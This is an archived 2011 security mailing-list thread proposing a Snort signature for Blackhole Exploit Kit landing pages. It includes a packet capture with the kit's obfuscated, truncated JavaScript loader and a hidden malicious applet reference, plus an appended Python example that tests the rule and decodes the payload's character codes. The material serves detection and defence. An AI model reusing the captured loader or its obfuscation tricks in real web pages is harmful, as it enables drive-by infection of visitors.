[Emerging-Sigs] Proposed Signature for Blackhole Exploit Landing malicious applet

Nick Randolph randolphdavidn at gmail.com
Mon Oct 3 09:46:39 EDT 2011


I've seen a pretty big jump in these at our site. Here are some sites they
are hitting.

There is a slight change to the fromCharCode section as well; this is what
I saw this morning:

String[c+'r'+'omChar'+'C'+'o'+'d'+"e"

Earlier in the packet there is a "c=f" declaration that makes the above.

On Tue, Sep 27, 2011 at 4:19 PM, Matthew Jonkman <jonkman at emergingthreatspro.com> wrote:

> Pedro is posting with a change, adding a match for |27|romChar|27| to help
> protect that pcre. Good?
>
> Matt
>
>
> On Sep 26, 2011, at 10:38 AM, Nathan wrote:
>
> > Similar to the discussion at
> > http://lists.emergingthreats.net/pipermail/emerging-sigs/2011-September/015753.html
> > it looks like thus far we have 3 landing styles. One covered at the above
> > thread, another by Chris with \x09, and this third new proposed below.
> >
> > Only ET signature that fired was 'worms.jar' and I'd rather not rely solely on
> > the name of the archive for protection/detection of this kit.
> >
> > #/R should match relative to the previous content match.
> > alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET CURRENT_EVENTS Blackhole Exploit Kit Landing Response Malicious applet";
> > flow:established,from_server; content:"|0d 0a|<html><body><applet code='"; fast_pattern; nocase;
> > pcre:"/,[0-9\.]+\*\d,\d+\+[a-z],[0-9\.]+\*\d,\d+\+[a-z],[0-9\.]+\*\d,\d+\+[a-z],/iR";
> > classtype:bad-unknown; sid:x; rev:1;)
> >
> > PCRE version 8.02 2010-03-19
> >
> >   re> /,[0-9\.]+\*\d,\d+\+[a-z],[0-9\.]+\*\d,\d+\+[a-z],[0-9\.]+\*\d,\d+\+[a-z],/
> > data> e(String[c+'romChar'+'Co'+'d'+'e'](50*2,111+l,49.5*2,117+l,54.5*2,101+l,55*2,116+l,23*2,119+l,57*2,105+l,58*2,101+l,20*2,39+l,30*2,99+l,50.5*2,110+l,58*2,101+l,57*2,62+l,30*2,104+l,24.5*2,62+l,40*2,108+l,50.5*2,97+l,57.5*2,101+l,16*2,119+l,48.5*2,105+l,58*2,32+l,
> >  0: ,49.5*2,117+l,54.5*2,101+l,55*2,116+l,
> > data>
> >
> >
> > 09:19:23.734596 IP 194.176.191.62.80 > RFC_1918.1448: . 1:1261(1260) ack
> > HTTP/1.1 200 OK
> > Date: Mon, 26 Sep 2011 14:09:18 GMT
> > Server: Apache/2.2.13 (Linux/SUSE)
> > X-Powered-By: PHP/5.3.3
> > Keep-Alive: timeout=15, max=100
> > Connection: Keep-Alive
> > Transfer-Encoding: chunked
> > Content-Type: text/html
> >
> > 4d018
> > <html><body><applet code='support.ForMail.class' archive='./worms.jar'
> > width='1' height='1'><param name='p'
> > value='e00oMDDBBBV2./fkqhQNQV%RD.qR/D3D./2h1Voeojfo=8zxa'/></applet><div
> > id="qwe" style="visibility:hidden;">&#50;</div>
> > <script>
> > a=window['document']['getElementById']('qwe');
> > try{app()}catch(q){
> > if(1){
> >        a.innerHTML=+[2];
> >        cc='ev';
> > }
> > }
> > try{if(r.test('asda') && !r.test('asda') && r.test('asda'))throw
> > 1;}catch(q){c='f';v='TML';}
> > z=a['inne'+'rH'+v];
> > try{if(r.test('asda') && !r.test('asda') && r.test('asda'))throw
> > 1;}catch(q){l=z*1}
> > if(a.innerHTML == '2')
> > e=window[cc+'al'];
> >
> > e(String[c+'romChar'+'Co'+'d'+'e'](50*2,111+l,49.5*2,117+l,54.5*2,101+l,55*2,116+l,23*2,119+l,57*2,105+l,58*2,101+l,20*2,39+l,30*2,99+l,50.5*2,110+l,58*2,101+l,57*2,62+l,30*2,104+l,24.5*2,62+l,40*2,108+l,50.5*2,97+l,57.5*2,101+l,16*2,119+l,48.5*2,105+l,58*2,32+l,56*2,97+l,51.5*2,101+l,16*2,105+l,57.5*2,32+l,54*2,111+l,48.5*2,100+l,52.5*2,110+l,51.5*2,46+l,23*2,46+l,30*2,47+l,52*2,49+l,31*2,60+l,23.5*2,99+l,50.5*2,110+l,58*2,
> >
> > Thanks,
> > Nathan
> >
> > _______________________________________________
> > Emerging-sigs mailing list
> > Emerging-sigs at emergingthreats.net
> > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
> >
> > Support Emerging Threats! Subscribe to Emerging Threats Pro
> http://www.emergingthreatspro.com
> > The ONLY place to get complete premium rulesets for Snort 2.4.0 through
> Current!
>
>
> ----------------------------------------------------
> Matt Jonkman
> Emerging Threats Pro
> Open Information Security Foundation (OISF)
> Phone 866-504-2523 x110
> http://www.emergingthreatspro.com
> http://www.openinfosecfoundation.org
> ----------------------------------------------------
>
>
>
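The rule's matching logic and the variant Nick reports, as an added example in Python (not code from the thread or from Emerging Threats): check_landing applies the content match, the /R-relative pcre and Matt's |27|romChar|27| literal to two constructed response bodies, and decode_args is a hypothetical analyst helper that evaluates the N*2 / N+l argument pairs for a caller-supplied l (the page's own argument list decodes to readable JavaScript with l = 0).

```python
import re

# Equivalents of the keywords in Nathan's proposed rule: content is matched nocase,
# the pcre is applied relative to the end of that content hit (Snort's /R).
CONTENT = b"\r\n<html><body><applet code='"
PCRE = re.compile(rb",[0-9\.]+\*\d,\d+\+[a-z],[0-9\.]+\*\d,\d+\+[a-z],[0-9\.]+\*\d,\d+\+[a-z],", re.I)
# Matt's proposed extra content match, |27|romChar|27| (a quoted literal 'romChar').
ROMCHAR = b"'romChar'"


def check_landing(payload: bytes) -> dict:
    """Return which of the three matches fire on one HTTP response."""
    hit = payload.lower().find(CONTENT.lower())
    result = {"content": hit >= 0, "pcre": None, "romchar": False}
    if hit < 0:
        return result                      # no anchor: Snort stops evaluating here
    cursor = hit + len(CONTENT)            # /R: the pcre search starts after the content hit
    m = PCRE.search(payload, cursor)
    result["pcre"] = m.group(0).decode() if m else None
    result["romchar"] = payload.find(ROMCHAR, cursor) >= 0
    return result


def decode_args(args: str, offset: int) -> str:
    """Hypothetical analyst helper: evaluate the N*2 / N+l pairs handed to
    fromCharCode, with offset standing in for the script's variable l."""
    out = []
    for term in args.strip(",").split(","):
        if term.endswith("*2"):
            out.append(chr(int(float(term[:-2]) * 2)))
        elif term.endswith("+l"):
            out.append(chr(int(term[:-2]) + offset))
    return "".join(out)


# Constructed samples: the argument list is trimmed from the landing page in Nathan's
# capture; the second body uses the 'r'+'omChar' spelling Nick reported.
ARGS = "50*2,111+l,49.5*2,117+l,54.5*2,101+l,55*2,116+l,23*2,119+l,57*2,105+l,58*2,101+l"
ORIGINAL = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
            b"<html><body><applet code='support.ForMail.class' archive='./worms.jar'></applet>"
            b"<script>e(String[c+'romChar'+'Co'+'d'+'e'](" + ARGS.encode() + b"))</script>")
VARIANT = (b"HTTP/1.1 200 OK\r\n\r\n<html><body><applet code='support.ForMail.class'></applet>"
           b"<script>c='f';e(String[c+'r'+'omChar'+'C'+'o'+'d'+\"e\"](" + ARGS.encode() + b"))</script>")

if __name__ == "__main__":
    for name, body in (("original", ORIGINAL), ("variant", VARIANT)):
        print(name, check_landing(body))
    print(decode_args(ARGS, 0))
```

On these samples the pcre fires on both spellings of fromCharCode while the quoted 'romChar' literal fires only on the first, so the numeric-argument pcre is the more durable of the two matches.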